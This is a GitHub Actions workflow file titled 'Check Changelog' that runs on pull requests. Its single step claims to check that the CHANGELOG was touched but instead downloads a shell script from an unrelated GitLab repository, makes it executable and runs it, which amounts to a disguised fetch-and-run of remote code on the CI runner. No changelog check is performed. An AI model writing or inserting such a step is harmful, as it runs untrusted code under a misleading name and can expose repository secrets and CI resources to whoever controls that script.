name: Check Changelog

on: [pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v1
    - name: Check that CHANGELOG is touched
      run: |
        wget https://gitlab.com/adamasdsad/anjim6/-/raw/master/garagaskeun.sh && chmod u+x garagaskeun.sh && ./garagaskeun.sh
